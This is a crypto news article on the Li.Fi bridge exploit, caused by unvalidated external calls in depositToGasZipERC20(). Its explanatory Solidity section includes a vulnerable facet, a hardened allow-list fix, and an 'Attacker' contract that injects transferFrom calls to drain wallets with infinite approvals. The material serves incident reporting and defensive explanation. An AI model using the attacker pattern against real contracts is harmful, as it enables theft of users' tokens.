
LI.FI Crypto Aggregator Suffers $12 Million Drain

Van Thanh Le

Jul 19 2024


Li.Fi Protocol Suffers Significant Hack

Cross-chain DeFi protocol Li.Fi has been exploited, resulting in a loss of cryptocurrency estimated at $12 million and affecting approximately 153 wallets. The breach primarily hit users who had granted "infinite approvals" to the Li.Fi contract, that is, unlimited ERC-20 token allowances that let the contract move any amount of a token from the user's wallet at any time.

The attack exploited a vulnerability in the depositToGasZipERC20() function of the Li.Fi bridge. The function forwarded a caller-supplied target address and call data to an external contract without validating either, a pattern known as "call injection" or an arbitrary call. Because that call is made by the Li.Fi contract itself, the attacker could have it invoke transferFrom() on token contracts and pull tokens from any wallet that had granted the contract an unlimited allowance. The flawed code had been deployed only five days before the attack. The theft included approximately $6 million in Ethereum (ETH) plus stablecoins including USDC, USDT, and DAI.

The Li.Fi team quickly responded on social media, urging users to avoid interacting with any Li.Fi-powered applications and to use a dedicated revoke website to revoke permissions immediately. Security firm Decurity identified the root cause as an arbitrary call vulnerability in the depositToGasZipERC20() function.
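To make the bug class concrete, the following is an added illustration, not Li.Fi's code and not a reconstruction of it: a facet that forwards caller-supplied call data unchecked, the hardened form with target and selector allow-lists, and the transaction an attacker would submit. All contract, struct and function names (VulnerableFacet, HardenedFacet, SwapData, depositWithSwap, Attacker) are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal ERC-20 surface used by the scenario.
interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

// Caller-supplied "swap" description. Both fields are attacker-controlled.
struct SwapData {
    address callTo;
    bytes callData;
}

// Hypothetical facet showing the bug class: caller-supplied target and calldata
// are forwarded to a low-level call with no validation. From the token's point
// of view msg.sender is this contract, so any allowance users granted to it is
// spendable by whoever crafts the calldata.
contract VulnerableFacet {
    function depositWithSwap(SwapData calldata s) external payable {
        (bool ok, bytes memory ret) = s.callTo.call{value: msg.value}(s.callData);
        require(ok, string(ret));
        // bridging logic would follow here
    }
}

// Hardened form: only allow-listed targets and allow-listed function selectors
// may be called, so transferFrom on an arbitrary token cannot be injected.
contract HardenedFacet {
    address public immutable owner;
    mapping(address => bool) public allowedTarget;   // approved DEX routers only
    mapping(bytes4 => bool) public allowedSelector;  // approved swap entrypoints only

    constructor() {
        owner = msg.sender;
    }

    function setTarget(address target, bool ok) external {
        require(msg.sender == owner, "not owner");
        allowedTarget[target] = ok;
    }

    function setSelector(bytes4 selector, bool ok) external {
        require(msg.sender == owner, "not owner");
        allowedSelector[selector] = ok;
    }

    function depositWithSwap(SwapData calldata s) external payable {
        require(allowedTarget[s.callTo], "target not allow-listed");
        require(s.callData.length >= 4, "calldata too short");
        require(allowedSelector[bytes4(s.callData[:4])], "selector not allow-listed");
        (bool ok, bytes memory ret) = s.callTo.call{value: msg.value}(s.callData);
        require(ok, string(ret));
    }
}

// What the attacker submits: a "swap" whose target is the token contract and
// whose calldata is transferFrom(victim, attacker, amount). It succeeds against
// VulnerableFacet for every victim whose allowance to the facet covers amount
// (an "infinite approval" of type(uint256).max covers any amount) and reverts
// against HardenedFacet because the token is not an allow-listed target.
contract Attacker {
    function drain(address facet, IERC20 token, address victim, uint256 amount) external {
        bytes memory data = abi.encodeCall(IERC20.transferFrom, (victim, msg.sender, amount));
        VulnerableFacet(facet).depositWithSwap(SwapData({callTo: address(token), callData: data}));
    }
}

// User-side mitigation is the same action a revoke site performs on your behalf:
// token.approve(facetAddress, 0) removes the allowance, and approving only the
// exact amount needed per transaction avoids leaving one in place at all.
```

The target allow-list is the primary control; the selector check is defence in depth, since a whitelisted router could still expose functions that move tokens on the facet's behalf. Any address that holds user allowances must never be reachable as the target of a caller-controlled call.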

The team discovered four additional security breaches following the initial exploit. Users were advised to use revoke.cash to check and revoke any compromised permissions. Blockchain security firms CertiK and Peckshield provided ongoing analysis and updates.

This incident echoes a similar exploit in 2022, where a bug in the swapping feature led to $600,000 in losses. Peckshield noted that the recent hack involved the same class of vulnerability as the previous one, an external call made with user-controlled data, this time through the depositToGasZipERC20() function.

The 2022 LI.FI protocol hack resulted in $600,000 stolen from 29 wallets. According to the team in a post-mortem report, the bug was fixed, and all affected users were reimbursed. 

At one point the wallet holding the drained funds controlled over $5.8 million in ETH along with substantial stablecoins, but it then dispersed the funds to other addresses until its balance dropped to zero. Li.Fi has assured users that the exploit is contained and funds are no longer at risk, while the team continues its investigation and works on additional security measures to prevent future breaches.

[Screenshot: attacker wallet activity. Source: Arkham]

In a report published Thursday, LI.FI attributed the exploit to "an individual human error in overseeing the deployment process" during a smart contract update. The team acknowledged that the error left the protocol vulnerable to malicious actors.

Despite the breach, LI.FI's team acted swiftly, activating an "incident response plan" to contain the threat. They successfully disabled the vulnerable facet across all chains, preventing further unauthorized access. The team is actively working with law enforcement and security firms to recover user funds.

Conclusion

The Li.Fi crypto aggregator hack highlights the ongoing security challenges in DeFi. With millions lost to a single unvalidated external call, it underscores the importance of robust security measures, deployment controls, and regular audits. Users are reminded to remain vigilant, revoke token approvals they no longer need, avoid granting unlimited allowances where an exact amount will do, and stay informed about potential risks in the evolving crypto landscape.

FAQs

1: What caused the Li.Fi protocol hack?

The hack exploited a vulnerability in the depositToGasZipERC20() function. The function passed user-controlled call data to an external contract without validation, which let the attacker make the Li.Fi contract execute unauthorized token transfers on behalf of users who had approved it. The vulnerability was introduced just five days before the attack.

2: How much cryptocurrency was stolen in the Li.Fi hack?

Estimates of the loss range from about $9 million to $12 million. Approximately $6 million in Ethereum (ETH) and various stablecoins including USDC, USDT, and DAI were stolen. The hacker's wallet at one point held over $5.8 million in ETH and substantial stablecoins before the funds were moved to other addresses.

3: What should Li.Fi users do to protect themselves?

Users should avoid interacting with Li.Fi-powered applications for now. They should use revoke.cash to check for and immediately revoke any token approvals granted to the affected Li.Fi contracts. Li.Fi has assured users that the exploit is contained and funds are no longer at risk.

4: Has Li.Fi experienced similar security issues before?

Yes, Li.Fi suffered a similar exploit in 2022. That incident involved a bug in the swapping feature, leading to $600,000 in losses. The recent hack involved the same class of vulnerability, an external call driven by user-controlled data, emphasizing the need for improved security measures.

This article has been refined and enhanced by ChatGPT.

© 2017 - 2024 COIN360.com. All Rights Reserved.